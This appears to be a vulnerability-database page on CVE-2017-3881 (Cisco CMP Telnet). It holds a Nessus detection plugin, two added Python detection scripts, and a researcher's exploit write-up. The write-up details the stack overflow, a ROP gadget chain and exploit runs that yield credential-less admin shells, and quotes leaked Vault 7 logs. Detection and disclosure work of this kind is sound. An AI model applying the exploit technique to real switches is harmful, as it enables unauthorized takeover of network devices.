or an Affiliate thereof."); script_dependencies("cisco_ios_xe_version.nasl"); script_require_keys("Host/Cisco/IOS-XE/Version"); exit(0); } include("audit.inc"); include("cisco_func.inc"); include("cisco_kb_cmd_func.inc"); flag = 0; override = 0; cmds = make_list(); ver = get_kb_item_or_exit("Host/Cisco/IOS-XE/Version"); # Check for vuln version # these were extracted from the CVRF if ( ver == "2.2.0" || ver == "2.2.1" || ver == "2.2.2" || ver == "2.2.3" || ver == "2.3.0" || ver == "2.3.1" || ver == "2.3.1t" || ver == "2.3.2" || ver == "2.4.0" || ver == "2.4.1" || ver == "2.4.2" || ver == "2.4.3" || ver == "2.5.0" || ver == "2.5.1" || ver == "2.6.0" || ver == "2.6.1" || ver == "3.1.0SG" || ver == "3.1.1SG" || ver == "3.2.0SG" || ver == "3.2.0XO" || ver == "3.2.10SG" || ver == "3.2.11SG" || ver == "3.2.2SG" || ver == "3.2.3SG" || ver == "3.2.4SG" || ver == "3.2.5SG" || ver == "3.2.6SG" || ver == "3.2.7SG" || ver == "3.2.8SG" || ver == "3.2.9SG" || ver == "3.3.0SG" || ver == "3.3.0SQ" || ver == "3.3.0XO" || ver == "3.3.1SG" || ver == "3.3.1SQ" || ver == "3.3.1XO" || ver == "3.3.2SG" || ver == "3.3.2XO" || ver == "3.4.0SG" || ver == "3.4.0SQ" || ver == "3.4.1SG" || ver == "3.4.1SQ" || ver == "3.4.2SG" || ver == "3.4.3SG" || ver == "3.4.4SG" || ver == "3.4.5SG" || ver == "3.4.6SG" || ver == "3.4.7aSG" || ver == "3.4.7SG" || ver == "3.4.8SG" || ver == "3.4.9SG" || ver == "3.5.0E" || ver == "3.5.0SQ" || ver == "3.5.1E" || ver == "3.5.1SQ" || ver == "3.5.2E" || ver == "3.5.2SQ" || ver == "3.5.3E" || ver == "3.5.3SQ" || ver == "3.5.4SQ" || ver == "3.5.5SQ" || ver == "3.6.0E" || ver == "3.6.1E" || ver == "3.6.2E" || ver == "3.6.3E" || ver == "3.6.4E" || ver == "3.6.5aE" || ver == "3.6.5bE" || ver == "3.6.5E" || ver == "3.6.6E" || ver == "3.7.0E" || ver == "3.7.1E" || ver == "3.7.2E" || ver == "3.7.3E" || ver == "3.7.4E" || ver == "3.8.0E" || ver == "3.8.0EX" || ver == "3.8.1E" || ver == "3.8.2E" || ver == "3.8.3E" || ver == "3.9.0E" || ver == "3.9.1E" ) flag++; if(!flag) 
```
audit(AUDIT_INST_VER_NOT_VULN, "Cisco IOS XE", ver);

# Check if the CMP subsystem is present, then
# Check that device is configured to accept incoming Telnet connections
if (get_kb_item("Host/local_checks_enabled"))
{
  flag = 0;

  # CMP subsystem check
  command = "show subsys class protocol | include ^cmp";
  command_kb = "Host/Cisco/Config/" + command;
  buf = cisco_command_kb_item(command_kb, command);
  if (check_cisco_result(buf))
  {
    if (!preg(string:buf, pattern:"^cmp\s+Protocol", multiline:TRUE))
    {
      # cmp subsystem is not present, so we can audit out as the
      # device is not vuln
      audit(AUDIT_INST_VER_NOT_VULN, "Cisco IOS XE", ver + " without the CMP subsystem");
    }
    # otherwise the CMP subsystem is present so we continue on to check
    # if incoming telnet is enabled
    cmds = make_list(cmds, command);
  }
  else if (cisco_needs_enable(buf))
  {
    flag = 1;
    override = 1;
  }

  # check that the device is configured to accept incoming Telnet connections
  # from the advisory
  command = "show running-config | include ^line vty|transport input";
  command_kb = "Host/Cisco/Config/" + command;
  buf = cisco_command_kb_item(command_kb, command);
  if (check_cisco_result(buf))
  {
    # if transport input lists "all" or "telnet", we are vuln
    # otherwise, if there is a "line vty" that is not followed by a
    # transport input line, we are vuln
    # otherwise, we are not vuln
    if (preg(string:buf, pattern:"^\s+transport input.*(all|telnet).*", multiline:TRUE))
    {
      flag = 1;
      cmds = make_list(cmds, command);
    }
    else
    {
      lines = split(buf, keep:FALSE);
      for (i = 0; i < max_index(lines); i++)
      {
        line = lines[i];
        if ((i+1) >= max_index(lines)) next_line = "";
        else next_line = lines[i+1];

        if (line =~ "^line vty" && next_line !~ "^\s+transport input")
        {
          flag = 1;
          cmds = make_list(cmds, command);
          break;
        }
      }
    }
  }
  else if (cisco_needs_enable(buf))
  {
    flag = 1;
    override = 1;
  }

  # no CMP subsystem, no telnet enabled = not vuln
  if (!flag && !override) audit(AUDIT_OS_CONF_NOT_VULN, "Cisco IOS XE", ver);
}

if (flag)
{
  security_report_cisco(
    port     : 0,
    severity : SECURITY_HOLE,
    override : override,
    version  : ver,
    bug_id   : 'CSCvd48893',
    cmds     : cmds
  );
}
else audit(AUDIT_HOST_NOT, "affected");
```
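The same exposure test the plugin performs, re-implemented over saved CLI output so it can be run offline against exported configurations. This is an added example, not Nessus plugin code; the `show subsys` and running-config samples are constructed.

```python
import re

# Regexes taken from the plugin's checks above; applied to saved CLI output.
CMP_RE = re.compile(r"^cmp\s+Protocol", re.M)
TELNET_TRANSPORT_RE = re.compile(r"^\s+transport input.*(all|telnet)", re.M)
TRANSPORT_RE = re.compile(r"^\s+transport input")
VTY_RE = re.compile(r"^line vty")


def cmp_subsystem_present(show_subsys: str) -> bool:
    """True when 'show subsys class protocol | include ^cmp' lists the CMP subsystem."""
    return CMP_RE.search(show_subsys) is not None


def include_vty_lines(running_config: str) -> str:
    """Emulate 'show running-config | include ^line vty|transport input'."""
    keep = [l for l in running_config.splitlines()
            if VTY_RE.match(l) or "transport input" in l]
    return "\n".join(keep)


def vty_accepts_telnet(filtered: str) -> tuple[bool, str]:
    """Apply the plugin's two rules to the filtered vty/transport lines.

    Rule 1: any 'transport input' naming 'all' or 'telnet' -> Telnet accepted.
    Rule 2: a 'line vty' stanza not immediately followed by a 'transport input'
            line keeps the IOS default, which the plugin treats as Telnet accepted.
    """
    if TELNET_TRANSPORT_RE.search(filtered):
        return True, "explicit 'transport input' allows telnet"
    lines = [l for l in filtered.splitlines() if l.strip()]
    for i, line in enumerate(lines):
        nxt = lines[i + 1] if i + 1 < len(lines) else ""
        if VTY_RE.match(line) and not TRANSPORT_RE.match(nxt):
            return True, f"{line.strip()!r} has no 'transport input', default applies"
    return False, "every vty line restricts transport input to non-telnet protocols"


def cmp_telnet_exposed(show_subsys: str, running_config: str) -> tuple[bool, str]:
    """Combined verdict: CMP subsystem present AND some vty accepts Telnet."""
    if not cmp_subsystem_present(show_subsys):
        return False, "CMP subsystem not present"
    return vty_accepts_telnet(include_vty_lines(running_config))


# Constructed sample outputs, not taken from a real device.
SUBSYS_WITH_CMP = "cmp                  Protocol    1.000.001\n"
SUBSYS_WITHOUT_CMP = ""
CONFIG_TELNET = """\
hostname sw1
line con 0
line vty 0 4
 transport input telnet ssh
line vty 5 15
 transport input telnet ssh
"""
CONFIG_SSH_ONLY = CONFIG_TELNET.replace("telnet ssh", "ssh")
CONFIG_DEFAULT_VTY = """\
hostname sw1
line vty 0 4
 transport input ssh
line vty 5 15
"""

if __name__ == "__main__":
    for name, cfg in [("telnet", CONFIG_TELNET), ("ssh-only", CONFIG_SSH_ONLY),
                      ("default-vty", CONFIG_DEFAULT_VTY)]:
        print(name, cmp_telnet_exposed(SUBSYS_WITH_CMP, cfg))
```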
Packetstorm
data source | https://packetstormsecurity.com/files/download/142121/ciscocatalyst2960-exec.txt |
id | PACKETSTORM:142121 |
last seen | 2017-04-13 |
published | 2017-04-13 |
reporter | Artem Kondratenko |
source | https://packetstormsecurity.com/files/142121/Cisco-Catalyst-2960-IOS-12.2-55-SE11-Remote-Code-Execution.html |
title | Cisco Catalyst 2960 IOS 12.2(55)SE11 Remote Code Execution |

data source | https://packetstormsecurity.com/files/download/142132/ciscocatalyst2960rocem-exec.txt |
id | PACKETSTORM:142132 |
last seen | 2017-04-14 |
published | 2017-04-13 |
reporter | Artem Kondratenko |
source | https://packetstormsecurity.com/files/142132/Cisco-Catalyst-2960-IOS-12.2-55-SE1-Remote-Code-Execution.html |
title | Cisco Catalyst 2960 IOS 12.2(55)SE1 Remote Code Execution |
Seebug
bulletinFamily | exploit |
description | Source: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/

Do you still have telnet enabled on your Catalyst switches? Think twice, here's a proof-of-concept remote code execution exploit for the Catalyst 2960 switch with the latest suggested firmware. Check out the exploit code [here](https://github.com/artkond/cisco-rce/). What follows is a detailed write-up of the exploit development process for the vulnerability leaked from the CIA's archive on March 7th 2017 and publicly disclosed by Cisco Systems on March 17th 2017. At the time of writing this post there is no patch available. Nonetheless there is a remediation - disable telnet and use SSH instead.

## Vault 7 CIA leak

A series of CIA documents were leaked on March 7th 2017 and [published](https://wikileaks.org/ciav7p1/) on WikiLeaks. Among other publications there was an interesting preauth code execution vulnerability that affected multiple Cisco switches. This vulnerability is code-named [ROCEM](https://wikileaks.org/ciav7p1/cms/page_20250772.html) in the leaked documents. Although very few technical details were mentioned, a few things stand out. The Vault 7 documents shed light on the testing process for the actual exploit. No exploit source code is available in the leak. Two use cases are highlighted there - the tool can be launched in either interactive mode or set mode. The interactive mode sends the payload via telnet and immediately presents the attacker with a command shell in the context of the same telnet connection.

Quote from the [doc](https://wikileaks.org/ciav7p1/cms/page_23134373.html):

```
Started ROCEM interactive session - successful:

[email protected]:/home/user1/ops/adverse/adverse-1r/rocem# ./rocem_c3560-ipbase-mz.122-35.SE5.py -i 192.168.0.254
[+] Validating data/interactive.bin
[+] Validating data/set.bin
[+] Validating data/transfer.bin
[+] Validating data/unset.bin
****************************************
Image: c3560-ipbase-mz.122-35.SE5
Host: 192.168.0.254
Action: Interactive
****************************************
Proceed? (y/n)y
Trying 127.0.0.1...
[*] Attempting connection to host 192.168.0.254:23
Connected to 127.0.0.1.
Escape character is '^]'.
[+] Connection established
[*] Starting interactive session

User Access Verification

Password:
MLS-Sth#
MLS-Sth# show priv
Current privilege level is 15
MLS-Sth#show users
    Line       User       Host(s)              Idle       Location
*  1 vty 0                idle                 00:00:00 192.168.221.40

  Interface    User               Mode         Idle     Peer Address

MLS-Sth#exit
Connection closed by foreign host.
```

Set mode. Modify switch memory in order to make any subsequent telnet connections passwordless.

Quote from the [doc](https://wikileaks.org/ciav7p1/cms/page_24969226.html):

```
Test set/unset feature of ROCEM

DUT configured with target configuration and network setup
DUT is accessed by hopping through three flux nodes as per the CONOP
Reloaded DUT to start with a clean device

From Adverse ICON machine, set ROCEM:

[email protected]:/home/user1/ops/adverse/adverse-1r/rocem# ./rocem_c3560-ipbase-mz.122-35.SE5.py -s 192.168.0.254
[+] Validating data/interactive.bin
[+] Validating data/set.bin
[+] Validating data/transfer.bin
[+] Validating data/unset.bin
****************************************
Image: c3560-ipbase-mz.122-35.SE5
Host: 192.168.0.254
Action: Set
****************************************
Proceed? (y/n)y
[*] Attempting connection to host 192.168.0.254:23
[+] Connection established
[*] Sending Protocol Step 1
[*] Sending Protocol Step 2
[+] Done
[email protected]:/home/user1/ops/adverse/adverse-1r/rocem#

Verified I could telnet and rx priv 15 without creds:

[email protected]:/home/user1/ops/adverse/adverse-1r/rocem# telnet 192.168.0.254
Trying 192.168.0.254...
Connected to 192.168.0.254.
Escape character is '^]'.

MLS-Sth#
MLS-Sth#show priv
Current privilege level is 15
MLS-Sth#
```

One piece of information that was useful to me in researching this vulnerability was the telnet debug output. Quote from the [doc](https://wikileaks.org/ciav7p1/cms/page_17760327.html):

```
14. Confirm Xetron EAR 5355 - Debug telnet causes anomalous output

1.Enabled debug telnet on DUT
2.Set ROCEM
3.Observed the following:

000467: Jun 3 13:54:09.330: TCP2: Telnet received WILL TTY-SPEED (32) (refused)
000468: Jun 3 13:54:09.330: TCP2: Telnet sent DONT TTY-SPEED (32)
000469: Jun 3 13:54:09.330: TCP2: Telnet received WILL LOCAL-FLOW (33) (refused)
000470: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LOCAL-FLOW (33)
000471: Jun 3 13:54:09.330: TCP2: Telnet received WILL LINEMODE (34)
000472: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LINEMODE (34) (unimplemented)
000473: Jun 3 13:54:09.330: TCP2: Telnet received WILL NEW-ENVIRON (39)
000474: Jun 3 13:54:09.330: TCP2: Telnet sent DONT NEW-ENVIRON (39) (unimplemented)
000475: Jun 3 13:54:09.330: TCP2: Telnet received DO STATUS (5)
000476: Jun 3 13:54:09.330: TCP2: Telnet sent WONT STATUS (5) (unimplemented)
000477: Jun 3 13:54:09.330: TCP2: Telnet received WILL X-DISPLAY (35) (refused)
000478: Jun 3 13:54:09.330: TCP2: Telnet sent DONT X-DISPLAY (35)
000479: Jun 3 13:54:09.330: TCP2: Telnet received DO ECHO (1)
000480: Jun 3 13:54:09.330: Telnet2: recv SB NAWS 116 29
000481: Jun 3 13:54:09.623: Telnet2: recv SB 36 92 OS^K'zAuk,Fz90X
000482: Jun 3 13:54:09.623: Telnet2: recv SB 36 0 ^CCISCO_KITS^Ap
```

Note the `CISCO_KITS` option received by the service on the last line. This proved to be an important string.

## Cisco advisory

On March 17th 2017 Cisco Systems [disclosed](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp) a vulnerability present in their switches. This disclosure was based on the documents from Vault 7:

> A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges.

Not many details were available at the time of writing this article, except for the following paragraph:

> The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors:
>
> * The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and
> * The incorrect processing of malformed CMP-specific Telnet options.

Long story short, the vulnerability allows the attacker to exploit the telnet service to gain remote code execution on the target switch. But in order to make any use of this advisory I needed more information on the matter. So I decided to dig deeper into the Cisco Cluster Management Protocol.

## Switch clustering

All right! I had two Catalyst 2960 switches for researching this vulnerability. Clustering sets up a master-slave relation between switches. The master switch is able to get a privileged command shell on the slave. As Cisco mentioned in its advisory, telnet is used as a command protocol between cluster members. Some info on clustering can be found [here](http://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst3750x_3560x/software/release/12-2_55_se/configuration/guide/3750xscg/swclus.pdf) and [here's](https://slaptijack.com/networking/cisco-catalyst-configuration-using-cluster-commands/) an example of setting up a cluster environment. Now to look for cluster traffic between them. The following should be in the master switch config:

```
cluster enable CLGRP 0
cluster member 1 mac-address xxxx.xxxx.xxxx
```

This will add a nearby switch as a cluster slave. `rcommand <num>` allows you to get a command interface on a slave switch from the master's interface. This is expected by design.

```
catalyst1>rcommand 1
catalyst2>who
    Line       User       Host(s)              Idle       Location
*  1 vty 0                idle                 00:00:00 10.10.10.10

  Interface    User               Mode         Idle     Peer Address
```

Let's look at the traffic generated by `rcommand`:

![](https://images.seebug.org/content/images/2017/04/pic/llc_traffic.png)

Hey! Where da hell is telnet traffic? Advisory clearly states:

> The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members.

Ok, running `show version` to see some more traffic:

```
catalyst2>show version
Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE1, RELEASE SOFTWARE (fc1)
```

Aha! Telnet traffic is actually being encapsulated into a layer 2 LLC packet. If we look close enough we will notice IP packets inside with chopped MAC addresses in the source and destination fields. Inside those "IP" packets reside valid TCP frames with a telnet session.

![](https://images.seebug.org/content/images/2017/04/pic/show_ver_cluster.png)

A telnet session is usually preceded by negotiating telnet options. Among them are: terminal size, terminal type etc. Take a look at the [RFC](https://tools.ietf.org/html/rfc854) for more info. Right before being presented with the welcome `catalyst2>` message an interesting telnet option is transferred to the server side:

![](https://images.seebug.org/content/images/2017/04/pic/cisco_kits_traffic.png)

Here you can see a telnet option "CISCO_KITS" sent from the master switch to the slave. The very same string is present in the Vault 7 documents during the execution of the exploit. Time to take a closer look at the switch internals.

## Peeking at firmware

Firmware is located at `flash:<version>.bin` on the switch.

```
catalyst2#dir flash:
Directory of flash:/

    2  -rwx     9771282   Mar 1 1993 00:13:28 +00:00  c2960-lanbasek9-mz.122-55.SE1.bin
    3  -rwx        2487   Mar 1 1993 00:01:53 +00:00  config.text
```

The built-in ftp client allows transferring this firmware to an arbitrary ftp server. Ok, now to analyze and extract the contents of the file with [binwalk](https://github.com/devttys0/binwalk):

```
$ binwalk -e c2960-lanbasek9-mz.122-55.SE1.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
112           0x70            bzip2 compressed data, block size = 900k
```

In order to facilitate static analysis of the resulting binary we had better know the firmware load offset. This offset is printed to the serial console during the boot process:

```
Loading "flash:c2960-lanbasek9-mz.122-55.SE1.bin"...@@@@@@@@@@@@@@@@@@@@@@
File "flash:c2960-lanbasek9-mz.122-55.SE1.bin" uncompressed and installed, entry point: 0x3000
executing...
```

Fire up IDA and let's roll. The CPU architecture is PowerPC 32-bit BigEndian. Load the binary at 0x3000:

![](https://images.seebug.org/content/images/2017/04/pic/ida_offset.png)

### Discovering strings

Remember the `CISCO_KITS` string in the cluster traffic I captured before? This was my starting point. After discovering most of the functions in IDA, I was able to see the cross-references to the strings located at the end of the firmware.

![](https://images.seebug.org/content/images/2017/04/pic/ida_cisco_kits.png)

The "CISCO_KITS" string is referenced by the `return_cisco_kits` function, which just returns this string as `char *`. We will focus our attention on the `call_cisco_kits` function at `0x0004ED8C` which calls `return_cisco_kits`.

![](https://images.seebug.org/content/images/2017/04/pic/ida_proximity1.png)

Because the telnet code is rather symmetrical for client and server, here we actually can see the format of the buffer that is being sent to the server side - `%c%s%c%d:%s:%d:`. This actually goes in line with the observed traffic where the sent buffer was `\x03CISCO_KITS\x012::1:`

```
if ( telnet_struct->is_client_mode )          // client mode? then send "CISCO_KITS" string
{
  if ( telnet_struct->is_client_mode == 1 )
  {
    cisco_kits_string_2 = (char *)return_cisco_kits();
    int_two = return_2();
    tty_str = get_from_tty_struct((telnet_struct *)telnet_struct_arg->tty_struct);
    *(_DWORD *)&telnet_struct_arg->tty_struct[1].field_6D1;
    format1_ret = format_1(
                    128,
                    (int)&str_buf[8],
                    "%c%s%c%d:%s:%d:",
                    3,
                    cisco_kits_string_2,
                    1,
                    int_two,
                    tty_str,
                    0);
    telnet_struct = (telnet_struct *)telnet_send_sb(
                                       (int)telnet_struct_arg,
                                       36,
                                       0,
                                       &str_buf[8],
                                       format1_ret,
                                       v8,
                                       v7,
                                       v6);
  }
}
```

Notice something? There are two `%s` string modifiers but only one string is actually present in the traffic sample, which is `CISCO_KITS`; the second one is empty and is confined between two `:` chars. Further observing the control flow of the very same function I noticed some funny behaviour when dealing with the second string (this time the server-side portion of the code):

```
for ( j = (unsigned __int8)*string_buffer; j != ':'; j = (unsigned __int8)*string_buffer )// put data before second ":" at &str_buf + 152
{
  str_buf[v19++ + 152] = j;
  ++string_buffer;
}
```

The data we sent over in the second `%s` string is actually copied until the `:` char without checking the destination boundaries, while the target buffer resides on the stack. What does this look like? Correct! ~~Buffalo~~ buffer overflow!

![](https://images.seebug.org/content/images/2017/04/pic/buffalo_overflow.png)

## Getting code execution

Getting control of the instruction pointer was easy as it was overwritten with the buffer I sent (btw I used [IODIDE](https://github.com/nccgroup/IODIDE) for debugging). The problem was that the heap and stack (which resides on the heap) were not executable. My best bet is that this is actually the effect of the data and instruction caches being enabled. Here's a slide from Felix Lindner's [presentation](https://www.blackhat.com/presentations/bh-usa-09/LINDNER/BHUSA09-Lindner-RouterExploit-SLIDES.pdf) at BlackHat 2009:

![](https://images.seebug.org/content/images/2017/04/pic/caches.png)

### ROPing a way out

Since there wasn't a way to execute code on the stack I had to use it as a data buffer and reuse existing code in the firmware. The idea is to chain function epilogs in a meaningful way to perform arbitrary memory writes. But wait, write what? Take a look at the decompiled function at `0x00F47A34`:

```
if ( ptr_is_cluster_mode(tty_struct_var->telnet_struct_field) )
{
  telnet_struct_var = tty_struct_var->telnet_struct_field;
  ptr_get_privilege_level = (int (__fastcall *)(int))some_libc_func(0, (unsigned int *)&dword_22659D4[101483]);
  privilege_level = ptr_get_privilege_level(telnet_struct_var);// equals to 1 during rcommand 1
  telnet_struct_1 = tty_struct_var->telnet_struct_field;
  ptr_telnet_related2 = (void (__fastcall *)(int))some_libc_func(1u, (unsigned int *)&dword_22659D4[101487]);
  ptr_telnet_related2(telnet_struct_1);
  *(_DWORD *)&tty_struct_var->privilege_level_field = ((privilege_level << 28) & 0xF0000000 | *(_DWORD *)&tty_struct_var->privilege_level_field & 0xFFFFFFF) & 0xFF7FFFFF;
}
else
{
  //generic telnet session
}
```

Interesting things happen here. The first thing to emphasize is that both calls of `ptr_is_cluster_mode` and `ptr_get_privilege_level` are made indirectly by referencing global variables. Check the line at address `0x00F47B60` - the `is_cluster_mode` function address is being loaded from the dword at `0x01F24A7`. In a similar way the address of `get_privilege_level` is being loaded from the `r3` register at `0x00F47B8C`. At this point the `r3` contents is a dereferenced pointer residing at address `0x022659D4 + 0x28 + 0xC`.

![](https://images.seebug.org/content/images/2017/04/pic/ida_dis.png)

If the `ptr_is_cluster_mode` call returns non-zero and the `ptr_get_privilege` call returns a value that differs from -1 we will be presented with a telnet shell without the need to provide any credentials. The variable `privilege_level` is checked for its value further down the code:

![](https://images.seebug.org/content/images/2017/04/pic/privilege_level_br.png)

What if I could overwrite these function pointers to something that always returns the desired positive value? Since the stack and heap weren't directly executable I had to reuse the existing code to perform such memory writes. The following [ROP](https://en.wikipedia.org/wiki/Return-oriented_programming) gadgets were used:

```
0x000037b4:
lwz r0, 0x14(r1)
mtlr r0
lwz r30, 8(r1)
lwz r31, 0xc(r1)
addi r1, r1, 0x10
blr
```

Load the `is_cluster_mode` function pointer into `r30`, load the value to overwrite this pointer with into `r31`. The value to overwrite with is the address of a function that always returns 1:

![](https://images.seebug.org/content/images/2017/04/pic/return_1_function.png)

```
0x00dffbe8:
stw r31, 0x34(r30)
lwz r0, 0x14(r1)
mtlr r0
lmw r30, 8(r1)
addi r1, r1, 0x10
blr
```

Perform the actual write.

```
0x0006788c:
lwz r9, 8(r1)
lwz r3, 0x2c(r9)
lwz r0, 0x14(r1)
mtlr r0
addi r1, r1, 0x10
blr
```

```
0x006ba128:
lwz r31, 8(r1)
lwz r30, 0xc(r1)
addi r1, r1, 0x10
lwz r0, 4(r1)
mtlr r0
blr
```

The previous two gadgets load a pointer to the `get_privilege_level` function into `r3`, and the value to overwrite it with into `r31`. The target value is a function that returns 15 (could've used this function for both writes tho):

![](https://images.seebug.org/content/images/2017/04/pic/return_15_function.png)

```
0x0148e560:
stw r31, 0(r3)
lwz r0, 0x14(r1)
mtlr r0
lwz r31, 0xc(r1)
addi r1, r1, 0x10
blr
```

This epilog makes the final write and returns to the legitimate execution flow. Of course, the stack frame should be formed accordingly to make this ROP chain work. Check out the exploit [source](https://github.com/artkond/cisco-rce/blob/master/c2960-lanbasek9-m-12.2.55.se1.py) to see the actual stack layout for this chain to work as intended.

### Running the exploit

At the end of the day I ended up with a tool with the ability to patch the function pointers responsible for credless connection and privilege level. Note that the exploit code is heavily dependent on the exact firmware version used on the switch. Using the exploit code against some different firmware will most probably crash the device. I used the knowledge from static and dynamic analysis of an older firmware, SE1, to build an exploit for the latest suggested firmware 12.2(55)SE11. All the difference between firmware versions is different function and pointer offsets. Also, the way the exploit works makes it easy to revert the changes back. Example:

```
$ python c2960-lanbasek9-m-12.2.55.se11.py 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done

$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15
catalyst1#show ver
Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE (fc3)
...
System image file is "flash:c2960-lanbasek9-mz.122-55.SE11.bin"
...
cisco WS-C2960-48TT-L (PowerPC405) processor (revision B0) with 65536K bytes of memory.
...
Model number                    : WS-C2960-48TT-L
...
Switch Ports Model              SW Version            SW Image
------ ----- -----              ----------            ----------
*    1 50    WS-C2960-48TT-L    12.2(55)SE11          C2960-LANBASEK9-M

Configuration register is 0xF
```

To unset this behaviour:

```
$ python c2960-lanbasek9-m-12.2.55.se11.py 192.168.88.10 --unset
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\ncatalyst1#'
[+] Sending cluster option
[+] Unsetting credless privilege 15 authentication
[+] All done

$ telnet 192.168.88.10
Escape character is '^]'.

User Access Verification

Password:
```

This RCE POC is available [here](https://github.com/artkond/cisco-rce/) for both firmware versions. A DoS version of this exploit is [available](https://github.com/artkond/cisco-rce/blob/master/ios_telnet_rocem.rb) as a metasploit module; it might work for most models mentioned in the Cisco advisory. |
id | SSV:92932 |
last seen | 2017-11-19 |
modified | 2017-04-10 |
published | 2017-04-10 |
reporter | Root |
source | https://www.seebug.org/vuldb/ssvid-92932 |
title | Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability (CVE-2017-3881) |
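A detection-side counterpart to the write-up above (an added example, not part of the Seebug entry or the artkond exploit): it extracts Telnet subnegotiations from a captured byte stream, flags any CISCO_KITS (option 36) subnegotiation arriving on a session that is not a cluster peer (the advisory's first factor), and checks the `%c%s%c%d:%s:%d:` payload for the overlong or unterminated second field that the server-side copy loop mishandles (the second factor). `MAX_SECOND_FIELD` and the treatment of the byte after the option code as a sub-option code are assumptions; the sample streams are constructed.

```python
IAC, SB, SE = 0xFF, 0xFA, 0xF0
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE
OPT_NAWS, OPT_CISCO_KITS = 31, 36
# Assumed threshold for the second "%s" field: a real cluster peer sends it
# empty, and the size of the stack buffer on the switch is not given above.
MAX_SECOND_FIELD = 64


def iter_subnegotiations(stream: bytes):
    """Yield (option, payload) for each IAC SB <opt> ... IAC SE in a Telnet stream."""
    i, n = 0, len(stream)
    while i < n:
        if stream[i] != IAC or i + 1 >= n:
            i += 1                      # ordinary data byte
            continue
        cmd = stream[i + 1]
        if cmd == SB:
            end = stream.find(bytes([IAC, SE]), i + 2)
            if end < 0:
                return                  # truncated subnegotiation: stop scanning
            body = stream[i + 2:end].replace(b"\xff\xff", b"\xff")  # unescape IAC IAC
            if body:
                yield body[0], body[1:]
            i = end + 2
        elif cmd in (WILL, WONT, DO, DONT):
            i += 3                      # command plus one option byte
        else:
            i += 2                      # escaped 0xFF data byte or a bare command


def parse_cisco_kits(payload: bytes) -> tuple[bool, str]:
    """Check a CISCO_KITS payload against the %c%s%c%d:%s:%d: layout.

    The first payload byte is taken as the sub-option code (0 in the debug
    output and traffic above); returns (well_formed, reason).
    """
    body = payload[1:]
    if len(body) < 2 or body[0] != 0x03:
        return False, "leading %c is not 0x03"
    name, sep, rest = body[1:].partition(b"\x01")
    if not sep or name != b"CISCO_KITS":
        return False, "first %s is not CISCO_KITS"
    parts = rest.split(b":")
    # "%d:%s:%d:" needs three ':' separators, so at least four parts after splitting
    if len(parts) < 4:
        return False, "missing ':' terminator (copy loop would run past the field)"
    if len(parts[1]) > MAX_SECOND_FIELD:
        return False, f"second %s field is {len(parts[1])} bytes, overflow-sized"
    return True, "well formed"


def scan_telnet_stream(stream: bytes, from_cluster_peer: bool = False) -> list[str]:
    """Return alerts for CMP (CISCO_KITS) options seen in a captured Telnet stream."""
    alerts = []
    for option, payload in iter_subnegotiations(stream):
        if option != OPT_CISCO_KITS:
            continue
        if not from_cluster_peer:
            alerts.append("CISCO_KITS option on a non-cluster Telnet session")
        ok, reason = parse_cisco_kits(payload)
        if not ok:
            alerts.append("malformed CISCO_KITS option: " + reason)
    return alerts


def sb(option: int, payload: bytes) -> bytes:
    """Frame a subnegotiation (helper used to build the constructed samples)."""
    return bytes([IAC, SB, option]) + payload.replace(b"\xff", b"\xff\xff") + bytes([IAC, SE])


# Constructed sample streams, not captured traffic.
BENIGN = bytes([IAC, WILL, 0x18]) + sb(OPT_NAWS, b"\x00\x74\x00\x1d")   # WILL TTYPE + NAWS 116x29
CLUSTER = sb(OPT_CISCO_KITS, b"\x00\x03CISCO_KITS\x012::1:")            # as seen from a real master
MALFORMED = sb(OPT_CISCO_KITS, b"\x00\x03CISCO_KITS\x012:" + b"A" * 200 + b":1:")
```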
The Hacker News
id | THN:02E235897DBA5868AE53102FE4D52D7B |
last seen | 2018-01-27 |
modified | 2017-03-20 |
published | 2017-03-19 |
reporter | Swati Khandelwal |
source | https://thehackernews.com/2017/03/cisco-network-switch-exploit.html |
title | Disable TELNET! Cisco finds 0-Day in CIA Dump affecting over 300 Network Switch Models |

id | THN:BCA8EAC492CA7110C715BA2B88A40246 |
last seen | 2018-01-27 |
modified | 2017-05-10 |
published | 2017-05-10 |
reporter | Mohit Kumar |
source | https://thehackernews.com/2017/05/cisco-network-switch-update.html |
title | Cisco Finally Patches 0-Day Exploit Disclosed In Wikileaks-CIA Leak |
References
- http://www.securityfocus.com/bid/96960
- http://www.securityfocus.com/bid/97391
- http://www.securitytracker.com/id/1038059
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp
- https://www.exploit-db.com/exploits/41872/
- https://www.exploit-db.com/exploits/41874/